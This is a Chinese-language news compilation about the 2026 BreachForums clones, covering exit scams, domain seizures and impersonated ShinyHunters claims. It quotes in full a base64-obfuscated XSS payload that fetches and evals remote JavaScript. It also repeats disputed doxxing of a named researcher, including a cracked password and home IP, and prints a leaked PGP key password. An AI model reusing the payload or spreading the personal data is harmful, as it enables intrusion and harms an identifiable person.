根据PwnForums论坛发布的耻辱墙公告以及X账号@IntCyberDigest的爆料,社交媒体和黑客社区的不同消息来源将保加利亚网络安全专家Angel Tsvetkov与BreachForums的管理员联系起来。BreachForums是买卖被盗数据的主要平台之一,当前主要有三个版本的BreachForums在运营,这里所指的BreachForums是Indra版本的BreachForums。
2026年3月15日,Indra的BreachForums暗网论坛突然无法访问,身份不明的管理员选择关闭了该网站,后来证实这是一起退出骗局。不过,当时网络反情报威胁调查联盟(CCITIC)声称对此事负责。
在Indra的BreachForums论坛关闭了十天后,论坛管理员之一“N/A”使用今年2月份的备份,通过新的域名BreachForums[.]sb重新启动该论坛,这次使用的管理员新化名是“Caine”。两天后,其他工作人员确认Caine就是之前卷款跑路的那个人,之后整个管理团队选择集体辞职。由于没有版主,“N/A”再次尝试出售该论坛的基础设施,此后大概是被DarkForums的Knox买走。
PwnForums称,这并非“N/A”首次犯案,在他担任管理员期间,“N/A”一直通过二级账户进行托管诈骗,兜售他并不拥有的数据库,收取款项却不交付任何产品。他还拖欠与他达成协议但从未履行义务的各方款项。
事件发展的时间线 2026年3月15日:BreachForums论坛无法访问,后经内部讨论,被描述为管理员主导的破坏活动。 2026年3月25日:据报道,BreachForums以“Caine”的化名重新启动,据称使用了之前的备份。 2026年3月27日:管理团队声称“Caine”和“N/A”是同一个人,整个管理团队集体辞职。 3月27日之后:据称管理员试图转移或出售论坛控制权。 被暗网论坛PwnForums钉上耻辱墙上的N/A究竟是谁 PwnForums已确认N/A为安吉尔·茨韦特科夫 (Angel Tsvetkov),他是一名保加利亚网络安全专家、渗透测试员和漏洞赏金研究员,拥有渗透测试和漏洞研究背景。他以其在识别和负责任地披露全球主要平台漏洞方面的工作而闻名。他在HackerOne和Intigriti等平台上享有盛誉,曾报告过影响大型企业的漏洞。他的工作主要集中在Web应用程序安全、漏洞发现和对抗性测试方面。
PwnForums称,Angel Tsvetkov是一位认证的道德黑客,HackerOne会员,曾因负责任的信息披露而获得哈佛大学、福特汽车公司、博世、BBC和OLX等多家企业机构的致谢,并曾荣获新闻媒体BBC和安全公司ESET的多项嘉奖。
然而,他表面上是一名白帽黑客,实际上却运营着最大的数据交易论坛,他同时是暗网论坛BreachForums的管理者,对论坛用户进行托管诈骗,两次卷款潜逃,并试图出售一个并非属于他的论坛。事实证明,道德黑客“负责任的信息披露”是有选择性的。
真实身份是如何关联出 PwnForums称,该归因得到了许多技术证据的支持,例如个人帐户和非法活动之间重复使用IP地址和登录密码,并得到@IntCyberDigest等X用户的认可。
从邮箱进行关联,Angel Tsvetkov一个常用的匿名邮箱为[email protected],常使用用户名SecPentester1337与secpente123,在RaidForums、Cracked.to、Dedicatet.com和Altenen等多个网络犯罪论坛注册了账号,填写的出生日期为1993年1月28日,另外在RaidForums论坛上还有一个用户名Vojilion9292与同一邮箱关联。
此外,[email protected]邮箱还关联了一个Twitter账号,注册于2018年9月29日,账号名为“Peter”,用户名为@Peter00111Peter,所在地为保加利亚,个人简介为:“渗透测试/漏洞猎手/道德黑客”。此人在多个正常论坛上使用多个名字,所有名字都与同一个电子邮件地址关联,所有地址都指向保加利亚普罗夫迪夫。
从密码进行关联,N/A的论坛账户密码被破解出来是“Awdawd123!”,然而有趣的是,Angel Tsvetkov个人网络安全咨询公司的官方商务邮箱[email protected]也反复使用同一个密码。
PwnForums感叹,这位获得认证的道德黑客、HackerOne会员、曾为多家机构提供密码安全咨询的人士,竟然在犯罪论坛账号和自己的商务邮箱中重复使用同一个密码。
从IP进行关联,N/A曾使用过的IP地址中有一个是78.130.187.42,该IP地址曾用于登录RaidForums和Cracked等论坛,该IP地址的地理位置位于保加利亚普罗夫迪夫。
无语的是,N/A曾联系PwnForums吹嘘其在该论坛植入后门并上传了一个名称为nike-sh.txt的文件,后该论坛管理员查看nike-sh.txt的访问日志,有且仅有一个IP:78.130.187.42,PwnForums认为Angel Tsvetkov通过自己的家庭IP地址访问了这个文件。
道德黑客Angel Tsvetkov驳斥了这些指控,称其“不实” 然而,保加利亚网络安全专家安吉尔·茨韦特科夫(Angel Tsvetkov)在接受采访时,断然否认了有关他是知名网络犯罪论坛BreachForums管理员的指控。茨韦特科夫称,散布的数据“是虚假的,而且极具破坏性”,并声称这些数据是基于“来自与网络犯罪相关的来源的未经证实的说法”。
当被直接问及他与该平台的所谓关联时,这位道德黑客坚称他没有参与BreachForums论坛的管理或运营,并否认拥有与网络犯罪活动相关的账户或化名。他表示:“我与相关人员没有任何关系,也从未在这些论坛担任过管理员或任何类似职务。”
关于他的身份与网络安全社区内这些活动之间的关联,这位专家指出,他并不清楚第三方是如何在未经授权的情况下使用他的数据的,并澄清说他目前正在分析情况。“我不知道第三方是如何在未经我授权的情况下在这个论坛上使用我的身份和数据的,”他表示。
这位专家在最初的沟通中坚称,已发布的信息“并不反映现实”,并警告说,信息的传播可能会产生影响。
“由于这篇文章的发表,有关我的虚假信息正在传播,执法部门和其他第三方也能看到这些信息,”他指出。
BreachForums论坛是一个为黑客及网络犯罪分子提供买卖被入侵数据库、黑客工具以及分享网络犯罪知识的暗网平台。与BreachForums论坛相关的各种戏剧性事件层出不穷,而且愈演愈烈。尽管屡遭执法部门的打击,偶尔还会发生内部冲突,但专注于买卖数据泄露的论坛仍然不断涌现。
“暗网下/AWX”梳理了近期Indra的BreachForums的变迁,在其关闭BreachForums之后,BreachForums[.]sb经过了几轮变化,先是被@Caine持有并继续运营,之后该论坛的管理团队集体退出。后明网域名BreachForums[.]as与BreachForums[.]sb被DarkForums的Knox买走,而据称是冒牌的Shinyhunters又开设了一个新明网域名BreachForums[.]ai来运营新版本的BreachForums。
Indra的BreachForums的工作人员集体辞职 @paw(@pine)在BreachForums[.]sb发布公开声明表示,BreachForums[.]sb的6名工作人员(@pine、@Loki、@888、@Tanaka、@paw、@Addka72424)已辞职,并声明:“请勿信任任何新出现的或现有的克隆站点,BreachForums这个名字已经不复存在,且永远不会回归。”
对此,在Telegram上假冒Shinyhunters的管理员@Caine声称,旧论坛的工作人员退出,是因为“勒索”。这些版主要求以1000美元的门罗币作为报酬,以补偿他们所做的一切工作。在被他拒绝后,他们选择了离开。而论坛将会组建新的工作人员团队。
BreachForums[.]as与BreachForums[.]sb显示了新的提示信息 “暗网下/AWX”尝试访问BreachForums[.]as与BreachForums[.]sb这两个明网域名,两个网站均显示相同的界面UI风格,一眼可以看出显然属于同一个所有者。
BreachForums[.]as网站展示了BreachForums[.]sb的明网域名与暗网域名:
BreachForums[.]sb则称,BreachForums现已完全由Knox(knox.hn)掌控。所有数据(包括最新的数据库和源代码)均已得到妥善保管。不再有混乱和诈骗,不再有不确定性——一切现已实现集中管理。请勿信任任何克隆站点。并提供了Telegram联系方式。
上周重启的一个新BreachForums论坛 周一,一名自称是勒索组织ShinyHunters成员的人宣布重启运营一个新的的BreachForums论坛(BreachForums[.]ai)。但一位与ShinyHunters官方频道有关联的人士表示,该组织与BreachForums的任何重启都毫无关系。他们表示:“我们与那个论坛没有任何关系。自从2025年10月10日被FBI查封后,我们就再也没有重启过它。”
本周重启的BreachForums论坛是“暗网下/AWX”前期介绍的Indra的BreachForums论坛的延续,上个月,Indra的BreachForums论坛的“基础设施,包括完整的数据库和源代码”,被“直接从其托管服务器”黑客入侵,并以1万美元的价格出售。新BreachForums论坛管理员(化名“x”)表示,前任管理员“N/A”得知此事后“惊慌失措,带走了能带走的东西,然后立即离开,没有通知社区”,之后“数据库就落入了不明人士手中”。
这一惊慌失措的说法似乎指的是3月16日发布在论坛旧版本上的一条公告,该公告宣布“BreachForums已死”,并正在寻找新的管理团队。公告表示:“我们现在正在寻找一位负责任的个人或团体,愿意接管论坛的领导权并继续提供支持。”
除了ShinyHunters的官方否认之外,安全研究人员还详细列举了“x”的说法中的矛盾之处,暗示其内容不实,并表示一些合法的BreachForums前运营者似乎正在注册多个BreachForums域名,以阻止类似的重启声明出现。
ShinyHunters表示,此次重启是利用先前泄露的数据发起的一系列BreachForum虚假论坛中的最新一起。该组织的一名成员说道:“其他威胁行为者能够恢复一个外观相似的合法论坛,包括重新导入旧用户数据,其中也包括我自己的ShinyHunters账户。”
IntelOpsV3称冒牌SH推出的BreachForums论坛又是一个冒牌货 暗网情报研究者@IntelOpsV3称,在Indra关闭其BreachForums并实施“卷款跑路”的时候,一个冒牌的SH(Shinyhunters)带着另一个冒牌的BreachForums(BreachForums[.]ai)出现了。于是,几乎在同一时间,至少有3个一模一样的网站,都声称自己是真正的BF。但不知道这些所谓BreachForums能运营多久。
新BreachForums论坛使用了暗网域名:http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd[.]onion
@IntelOpsV3提醒,其正在密切关注所有新的BF克隆站点,请谨慎对待所有这些新克隆站点。因为原BreachForums的PGP密钥、网站代码和数据库都已泄露,是时候让Breachforums这个名字长眠了。
@IntelOpsV3称,这是新的BF团队,可以看到他们在TG上假扮成“Shinyhunters”,他们声称自己是唯一的正宗BF,他们还发布了一则警告,称其他克隆站点均为假冒。这个新冒出的BreachForums克隆站点由doxeur、kiroshell和breach3d所有。breach3d就是那个发布假Dell数据库的冒牌Shinyhunters。
但可惜的是,SLSH已经发布了BFv5数据库,并指认他们是冒牌货。真正的SLSH称:“目前所有的论坛都是假的 [ .sb .ac .fi .bf .us 等],如果它们继续存在,我们将泄露所有BF的备份。因为我们掌握了所有MyBB 1.8版本的漏洞利用代码。”
@IntelOpsV3称,这个论坛是假的。这个论坛的ShinyHunters是个冒牌货。他们冒充IntelOps、Pine、Loki等组织,正如你们从我们的推特帖子中看到的,这个论坛里充斥着各种角色扮演。
BreachForums[.]ai的管理员“x”发布公告驳斥@IntelOpsV3 BreachForums[.]ai的管理员“x”于4月2日发布公告进行回应,并澄清该论坛的现状。“x”表示,他们没有导入旧BreachForums的SQL数据库,并不意味着他们是蜜罐(honeypot)或退出骗局(exit scam)。他自称这是一个全新的开始,这是BreachForums的官方延续。并请大家在做出假设前,先进行适当的研究,不要基于不完整的信息下结论。
公告表示,他们理解大家的怀疑,但事实不会改变。一旦论坛完全开发并稳定下来,他们将对克隆站点采取行动。“x”称,一些来源(如 Twitter 上的 IntelOps (@intelopsv3))散布了虚假信息,声称其是退出骗局。这些说法是错误的。IntelOps有历史性地不经查证就发布信息,并经常误报或歪曲细节。
“x”称,他们鼓励大家保持信息灵通、核查事实,并避免匆忙下结论。他们不是蜜罐/退出骗局。
公告表示,如果是蜜罐,他们会尝试修改MyBB源代码来尽可能记录用户的信息。相反,他们移除了IP记录,并用自定义构建的垃圾邮件预防系统取而代之。即使FBI或任何执法机构查封后端服务器也找不到任何有用的东西。
“x”宣称自己的VPS是完全加密的,用户的隐私是优先事项。
SLSH冒牌者究竟是谁 独立安全研究人员Ryan Moran(@rmoskovy)表示,在对这位自称“ShinyHunters”冒牌者进行分析时,我使用一个假账号通过Telegram向其发送消息,声称需要向“Rey”(一名与SH/SLSH有关联的威胁行为者)偿还一大笔钱,并要求对方提供“Rey”的联系方式。
然而,对方非但没有提供“Rey”的联系方式,反而要求@rmoskovy直接向其汇款。当进一步追问时,对方发来了一个拼写错误的账号,该账号是“Rey”真实用户名的拼写变体:
2026-02-26 -> Qilin 2026-02-26 -> Rey 2026-02-20 -> Qiliin 2026-01-24 -> XiaoBtc ( MBTC ) 2025-12-24 -> MBTC 2025-12-24 -> Crimesite 2025-11-08 -> Bjorka 2025-11-04 -> NinjaBoi6890 2025-10-31 -> SkyHunters 2025-10-25 -> Asley 2025-09-10 -> Kimbo 2025-06-09 -> Bebale Office 2025-05-15 -> Lesley
本月初,“暗网下/AWX”曾报道,两个版本BreachForums论坛的多个明网域名遭执法机构查封。本月中旬,由Indra运营的暗网数据泄露论坛BreachForums遭遇了长期停机,明网网站无法正常访问,暗网网站提示“Onion site not found”。前端仍正常运行,但后端已无响应,基本可以确定其背后的基础设施出现了问题,而非黑客攻击或计划内维护。
虽然BreachForums管理层表示这只是例行维护,但据威胁情报专家猜测,可能有两项协同行动针对该论坛:一是由LAPSUS$与HasanBroker共同宣布的“Operation Lebensraum”联盟,明确以“抹除Indra及其BreachForums论坛”为目标;二是“网络反情报威胁调查联盟”(CCITIC),一家调查网络威胁以协助当局的非营利组织,该组织声称是他们攻击了Indra的BreachForums。
经“暗网下/AWX”长期坚持跟进与持续跟踪报道,可以看到BreachForums数据泄露论坛有着混乱的黑暗历史:多次遭FBI查封(2023–2025年)、大规模数据泄露(2026年1月有32.4万用户信息曝光)、疑似蜜罐的重新启动、多次域名被查封后重新启用新域名……自2022年以来,BreachForums历经多次FBI查封仍存活至今,每次被关停后都会更换顶级域名(.st ➡️ .cx ➡️ .is ➡️ .vc ➡️ .hn ➡️ .as…)。
这次不管是谁的努力,瘫痪了Indra的BreachForums论坛,则为其竞争对手HasanBroker版本的BreachForums论坛铺平了道路,该版本自诩为合法继承者,且正获得越来越多的支持。
“暗网下/AWX”继续追踪分析后基本确认,Indra版本BreachForums的关闭,既非黑客攻击,也非例行维护——而是被强制下线。网络反情报威胁调查联盟(CCITIC)成功关闭了Indra的BreachForums论坛,Indra被迫发布一则告别公告,但该公告目前已经不可见。
Indra的BreachForums论坛在CCITIC的持续努力与施压下关闭 根据CCITIC官网的介绍:
网络反情报威胁调查联盟(Cyber Counter-Intelligence Threat Investigation Consortium)是当今互联互通的数字环境中,抵御不断演变的网络威胁的一座协作堡垒。
本组织汇聚了网络安全专家、研究人员和分析师,共同构建统一的防御网络。依托自主研发的平台和集体智慧,我们在威胁危及关键基础设施之前,便能对其进行识别、分析并予以消除。
CCITIC宣告, BreachForums.as已下线——CCITIC成功将其击溃。其在领英上发文称,该域名breachforums[.]as是这个臭名昭著的网络犯罪论坛在明网上的最新版本,目前无法访问。这不是系统故障,而是被强制下线。
CCITIC表示,他们已成功定位到BreachForums背后的上游服务器,这些服务器均托管于DigitalOcean(ASN 14061)位于法兰克福数据中心的机房。随后,该组织提交了多份滥用报告(由于DigitalOcean要求每个 IP 地址提交一份报告,因此不得不提交了三份完全相同的报告),美国云服务提供商DigitalOcean终止了对这些服务器的服务。
🖥️ 已确认的服务器IP:
🔹 164.90.223.186 — 与 breachforums.as 域名直接关联
🔹 138.68.73.155
🔹 68.183.223.214
CCITIC于2026年3月6日扫描时,确定这些服务器拥有相同的技术指纹:WSGIServer/0.2、CPython/3.12.12、端口 3093、TLS 1.3。
2026年3月12日,CCITIC向DigitalOcean安全运营中心提交了滥用报告后,该托管服务商审查了CCITIC的报告,并对与BreachForums基础设施(breachforums[.]as)相关的账户采取了行动。
Indra发表告别信后选择转移资金退出 随后,访问Indra的BreachForums论坛,跳转至:https://breachforums[.]as/info/download.php,并显示一封告别公告:
亲爱的世界,
是时候向大家告别了——尽管并非彻底的告别。
BreachForums 早已不仅仅是一个平台;它是一个社区,在许多方面,更是一项你们每个人都理解并为此贡献力量的共同使命。
在过去的几个月里,我竭尽所能帮助这个社区重振旗鼓并日益壮大,我坚信这里所建立的一切将会继续存在并不断发展。
然而,此刻我必须退居二线。我个人生活中一些重要且迫切的事务需要我投入精力,其中包括一项新事业的启动。尽管如此,只要条件允许,我仍会尽我所能继续支持 BreachForums。
因此,我们现正寻找一位负责任的个人或团队,接手论坛的领导工作并提供持续支持。
现任版主团队将保持不变,并继续履行其一贯职责:Loki、Tanaka、888 和 Pine。
我们期待就论坛的未来展开严肃而认真的讨论。
如有兴趣,请通过以下渠道联系管理团队:
Session: 054d67e476285098efb2bbe770d205588b6639c5af9157edf138b630cd53109723
TOX:D1E8EB300080486048B366464BD5D57C86D6FA8234E784714541BAEAFB64FC6A7CCD72D7F819
— BreachForums 管理团队
RaidForums、BreachForums都是曾经臭名昭著的暗网数据泄露论坛,提供被盗数据发布与交易的平台。近些年,在美国联邦调查局、国际刑警组织、欧洲刑警组织等国际执法机构的努力下,几个暗网数据泄露论坛被打击了多次。
目前仍然还存在且在暗网与明网可以同时访问的暗网数据泄露论坛还剩:两个版本的BreachForums(Indra的BreachForums与Hasan的BreachForums)、BreachForums的最大竞争对手DarkForums,这些论坛除了面临竞争对手的挑战,还得面对在执法机构的查封压力。
近期,执法机构采取密集行动,查封了三个暗网数据泄露论坛的多个域名。随后这些论坛迅速响应,启用了新的明网域名。“暗网下/AWX”整理了这几个论坛的明网域名更迭记录。
Indra的BreachForums的明网域名更迭 2025年12月,在多个版本的BreachForums被执法机构摧毁后,Indra推出了新的BreachForums论坛,明网域名为breachforums[.]bf。
2026年2月4日,breachforums[.]bf域名遭受据称HasanBroker等的社会工程学攻击,被暂停解析,暂停期间,Indra的BreachForums迅速启用了新的明网域名breachforums[.]jp。后Indra设法找回了bf域名,并恢复使用了bf域名,随即jp域名被放弃使用。
2026年2月,安全研究人员多次研究出breachforums[.]bf的真实IP,分别为:95.129.233.76、185.129.102.34、31.172.87.150。
2026年2月14日,breachforums[.]bf域名再次被暂停解析,这次疑似是真被执法机构查封,并同时查封了breachforums[.]jp域名。
同日,Indra的BreachForums又一次迅速启用了新明网域名breachforums[.]as,并发布公告称,此次纯属注册商单方面暂停服务,与BreachForums内部运营无关,系统安全状态完好无损。未发生任何安全事件,未出现数据泄露,其基础设施、服务器及数据均未受影响。
Hasan的BreachForums的明网域名更迭 2026年1月,原BreachForums的管理员HasanBroker推出了另一个新的BreachForums,明网域名为breachforums[.]cz。2026年2月12日,有安全研究人员分析出该域名的子域名mail[.]breachforums[.]cz背后的真实IP为176.123.2.86。
2026年2月20日,breachforums[.]cz域名被执法机构查封,虽然依然能打开,但是访问时提示“Page could not be loaded”。在breachforums[.]cz域名被查封后,Hasan的BreachForums启用新明网域名breachforums[.]in为其主域名。
DarkForums的明网域名更迭 2025年,暗网出现一个新的数据泄露论坛DarkForums,成为BreachForums有力的竞争对手。DarkForums使用明网域名darkforums[.]st。
安全研究人员分析出了darkforums[.]st背后的IP:185.178.208.177,185.11.145.145, 185.11.145.254,185.196.9.155,85.208.156.120。
2025年12月,DarkForums启用新的明网域名darkforums[.]io,2026年1月,有安全研究者称该域名背后对应的真实IP有185.208.158.89、185.178.208.154。2026年2月4日,darkforums[.]io域名被执法机构查封,无法访问。
2026年2月4日,darkforums[.]io域名被查封后,DarkForums启用明网域名darkforums[.]me为主域名,该域名是DarkForums之前就持有的备用域名。当时DarkForums的所有者Knox发布带有PGP签名的论坛公告宣布“Official Domains – Old Mirrors Disabled”:
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
All previous domains and mirror links have been permanently disabled by the providers and are no longer active.
Please update your bookmarks. The only official addresses going forward are:
Clearnet: https://darkforums.me
Onion (Tor): http://darkfoxaqhfpxkrbt7vxns2z2u2k72sgmqbzeorupaiottw3ecm2wgyd.onion
We will announce and list any new mirrors here as they are added.
自从多次重启后的BreachForums论坛被FBI查封之后,暗网先后出现了两个名为BreachForums的论坛,一个是Indra的BreachForums[.]bf(管理员Indra与N/A),一个是Hasan的BreachForums[.]cz(管理员HasanBroker与breach3d)。这两个论坛的诞生注定会硝烟四起,BreachForums克隆论坛之间的一场战役正在打响。
“暗网下/AWX”此前跟踪报道,Indra的BreachForums[.]bf于2025年12月诞生,使用MyBB搭建,通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立,宣称自己才是真正的官方BF论坛;Hasan的BreachForums[.]cz于2026年1月出现,使用XenForo搭建,称自己才是正统,目前已吸引逾1400名成员加入。
近期,这两个BreachForums论坛的战争进入了白日化阶段,先是BreachForums[.]bf域名被社会工程学攻击后被暂停,其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本(XSS)漏洞攻击,整体而言,Hasan的BreachForums[.]cz略占上风。
BreachForums[.]bf域名丢失后又被找回 2月3日,BreachForums[.]bf域名突然被域名注册商暂停访问,其管理员N/A发布公告,紧急启动BreachForums[.]jp域名来替代访问。同时,Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”(拿下仿冒克隆),并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。
2月8日,访问BreachForums[.]bf,显示异常的篡改消息以及倒计时,暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容:公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。
根据暗网研究专家IntelOps(@IntelOpsV3)发布的消息,有黑客窃取某西非国家政府邮箱后,通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助,但技术援助集体成功推动其采取行动。
据称,Hasan在该域名被删除后成功注册该域名,并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息,重新夺回BreachForums[.]bf域名控制权,并发布公告恢复该域名的使用。
BreachForums[.]cz网站被篡改后快速恢复 2月5日,BreachForums[.]cz网站曾遭遇了一次跨站脚本(XSS)漏洞攻击,短暂遭到篡改,疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释,该XSS漏洞可利用性源于XenForo解析BBcode的机制,属于原生漏洞即零日漏洞。
该Payload利用JavaScript的eval函数实现Base64编码的解码功能(部分依赖混淆性安全机制)。通过atob函数解码后,得到以下在鼠标悬停时触发的JavaScript有效载荷:
(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})() Payload如下:
'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob("KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ=="))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .
自从后缀为bf的新BreachForums出现后,原BreachForums的管理员HasanBroker一直表示该BreachForums(breachforums[.]bf)系冒牌货,并称自己将努力恢复真正的BreachForums,并重塑辉煌。终于在1月17日,HasanBroker在其Telegram频道宣布了另一个新BreachForums的诞生,开放邀请大家注册。
“暗网下/AWX”看到,HasanBroker创建的BreachForums是基于论坛程序XenForo搭建的,而传统的BreachForums都是使用论坛程序MyBB,或许是由于MyBB可能存在一些不确定漏洞的缘故。
HasanBroker的新版本BreachForums明网与暗网地址如下:
明网地址:breachforums[.]cz
暗网地址:http://breach5yz2b5lepmq4gaqwcon3jippw3bislhvvdavem5git55sy2nid[.]onion
在宣布该新BreachForums(breachforums[.]cz)成立的公告中,HasanBroker宣称,BreachForums已经不复存在,支离破碎,影响力日渐式微。如今剩下的只有噪音、诱饵陷阱和那些试图取代昔日辉煌的平台。该新论坛旨在重建一个专注于信息、技术讨论和社区驱动的交流空间,摒弃一切浮夸作秀、虚假承诺和虚伪伪装。
HasanBroker称,他无意改写历史,也并非觊觎从未正式传承的头衔。这无关所有权,而是关乎方向。他们将回归这些论坛的初心:赚钱、恶搞、突袭、数据泄露、数据交易,以及最重要的——享受乐趣。
HasanBroker表示,注册受到严格限制。所有申请均需人工审核,审核标准包括:
展现出的操作意识 行为规范且具备常识 HasanBroker提醒道,不使用Gmail等邮箱就能很好地证明这一点,并举例说cock.li是一个不错的隐私选择。
HasanBroker承诺新BreachForums保持匿名,并致力于最大限度地减少不必要的曝光。他们已采取措施规避不记录IP地址的问题,并从论坛软件中彻底移除了该功能。目前,他们仅通过服务器日志记录IP地址,以防止DDoS攻击,但无法追踪到目标用户,且日志每天都会被删除。
HasanBroker要求使用VPN或Tor浏览器访问他的新BreachForums
最后,HasanBroker宣布:
如果您想恶意捣乱、攻击或制造全球性事件——这里正是您理想的去处。
如果您正在寻找一个重视谨慎、贡献和持续性的社区——欢迎您。
愿上帝保佑我们的论坛,消灭它的敌人。
BreachForums万岁!
此外,HasanBroker在Telegram频道表示,虽然随着所有重要工作的完成,新BreachForums论坛已搭建完成正式上线,但还会有更多的更新,如SMTP服务器还需要时间完善,注册采用手动审核机制,不过这部分问题不算太严重。太阳已在BreachForums论坛升起,照亮了那些骗子。
HasanBroker称在Telegram和其他平台上的活跃度将相对减少,专门使用BreachForums进行数据交易等,除非情况发生变化。接下来几天将添加Shoutbox和Escrow功能。HasanBroker提醒,无论多么有吸引力,切勿让任何平台剥夺您的操作安全权利。始终使用VPN或Tor,如果担心后门,可以两者都用。
近2天的Telegram频道公告发布了该论坛的更新,将Tor图标移至Clearnet主界面(此前图标显示位置错误,即使用户退出Tor网络,图标仍会保留),升级后相关问题已得到解决。另外,HasanBroker宣布了接下来将要开发的功能或者将要进行的活动:
完整的托管系统 向我们的成员颁发奖励 可能的赠品活动 ShinyHunters和其他团体发布的高质量数据 广告系统 喊话箱 对于“广告系统”,HasanBroker解释道,每个横幅将是一个N/A模板,直到有人决定为其支付1000积分,这些积分可以通过活跃度获得或支付35欧元。一旦你这样做,它将进入审批队列,并可以由工作人员接受——如果被拒绝,你将获得积分返还,并且可以再次申请。常见问题将显示你需要避免的审批事项。
对于“托管系统”,HasanBroker解释道,每个人都知道托管是如何运作的,它是任何论坛的重要结构,尤其是像BreachForums这样的论坛——你提交你的数据,买家提交资金,当双方都批准时,交易发生,否则,资金将自动从任一方退回。
对于“喊话箱”,HasanBroker解释道,虽然有点晚,但他们正在重新设计在MyBB软件上使用的原始喊话箱,但由于新BreachForums使用的是XenForo,设计上有些不同,它将很快发布,比之前的系统快得多。
经测试,截止发稿,从零开始的新BreachForums论坛的注册用户已经250多人,帖子数目60多篇,活跃度渐增,发展势头很明显。HasanBroker的新BreachForums(breachforums[.]cz)是否能够超越或者替代Indra的新BreachForums(breachforums[.]bf),FBI等执法部门对此后起之秀是否有新的执法行动,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
1月9日,以ShinyHunters勒索团伙命名的网站shinyhunte[.]rs更新了一条长消息,并泄露了一个数据库,其中包含与暗网上臭名昭著的数据泄露论坛BreachForums相关的所有用户记录。
正如“暗网下/AWX”长期追踪及报道,BreachForums是继RaidForums被FBI查封之后的一个新的暗网数据泄露论坛,后又多次被FBI摧毁,却又多次重生。目前,仍有最新版本的BreachForums正在明网与暗网中运营。
此次泄露的数据发布在明网域名shinyhunte[.]rs上,据报道该域名与同名的臭名昭著的勒索软件团伙无关,在该域名点击“continue”后会默认下载一个名为“breachedforum.7z”的7zip压缩文件,解压可以看到三个文件:描述ShinyHunters历史的文本文件、名为“databoose.sql”的用户数据库文件,以及BreachForums用于签署官方消息的PGP私钥文件。其中“databoose.sql”是一个包含323,986名BreachForums用户的MySQL数据库,内容还包括哈希密码、私人消息和论坛帖子。
此数据泄露事件发生在去年8月,泄露的数据库中的日期是8月11日,这正是此前.hn后缀域名版本的BreachForums因运营者被捕而关闭的日子。当时该网站的管理员宣布,由于担心该网站已被执法部门入侵,因此将关闭该网站。
泄露BreachForums数据库的网站shinyhunte[.]rs包含两个新元素:一个受密码保护的PGP私钥文件,以及一份长达4400字、题为《DOOMSDAY》的夸张而怪异的宣言,作者自称是“James”,并声称自己是此次泄露事件的幕后黑手。同时泄露了密码,泄露的PGP密钥是“Nigeria321/_@”。
BreachForums一次又一次被打倒又爬起来 BreachForums是2022年被美国当局查封的RaidForums网站的继任者,它自诩为一个讨论数据泄露、非法色情内容、勒索软件和黑客工具等话题的网站。
2023年3月,BreachForums的创始人兼管理员康纳·布莱恩·菲茨帕特里克(Conor Brian Fitzpatrick)被FBI逮捕,三个月后,其明网域名被查封。菲茨帕特里克后来被美国法院判处20年监管释放。
该论坛后来在黑客组织ShinyHunters和前BreachForums管理员“Baphomet”的领导下重新开放。该网站于2024年5月15日再次关闭,明网域名也被查封,但所有者ShinyHunters在几个小时后又找回了明网域名。
BreachForums v1:
BreachForums(托管于breached.vc/.to/.co,由pompompurin运营)-从2022年3月到2023年3月。
BreachForums v2
BreachForums(托管于breachforums.st/.cx/.is/.vc,由ShinyHunters运营)-从2023年6月到2024年5月。
目前,BreachForums有多个版本,包括使用“.bf”、“.hn”、“.st”甚至“.in”顶级域名的版本。最新版本,即“.bf”后缀域名下的版本,仍在运营。
据报道,2024年,一名名为Baphomet的替代管理员被逮捕;2025年,又有五名被指控与该网站有关联的人员被拘留。最终,去年十月,BreachForums暗网网站被查封。
泄露的数据库会带来什么影响 泄露的数据库包含323,986条用户的数据,这些数据提取自名为“hcclmafd2jnkwmfufmybb_users”的MySQL数据库表,该表与开源论坛软件MyBB相关。该数据库的泄露可能是由于MyBB论坛中的Web应用程序漏洞或配置错误造成的。此次事件表明,数据泄露不仅可能发生在合法企业,也可能发生在暗网上的网络犯罪分子身上,而后者造成的破坏可能更大。
BreachForums管理员“N/A”承认了此次泄露事件,称这是在2025年8月恢复论坛期间的失误所致,当时用户表和PGP密钥被临时存放在一个未加密的文件夹中,在该窗口期内被下载。
眼下的问题是,如果警方尚未掌握该数据库,那么泄露的数据库是否对他们有用。数据库包含电子邮件地址和IP数据,这些数据很可能指向代理服务器或匿名服务。一项分析发现,大多数IP地址指向本地回环地址(127.0.0.9),但仍有70296条记录包含公共IP地址,这些地址可能对执法部门和网络安全研究人员具有价值。另外,在BreachForums注册时最常用的电子邮件服务是Gmail,这或许能为警方查找那些粗心大意、没有掩盖踪迹的人提供取证线索。
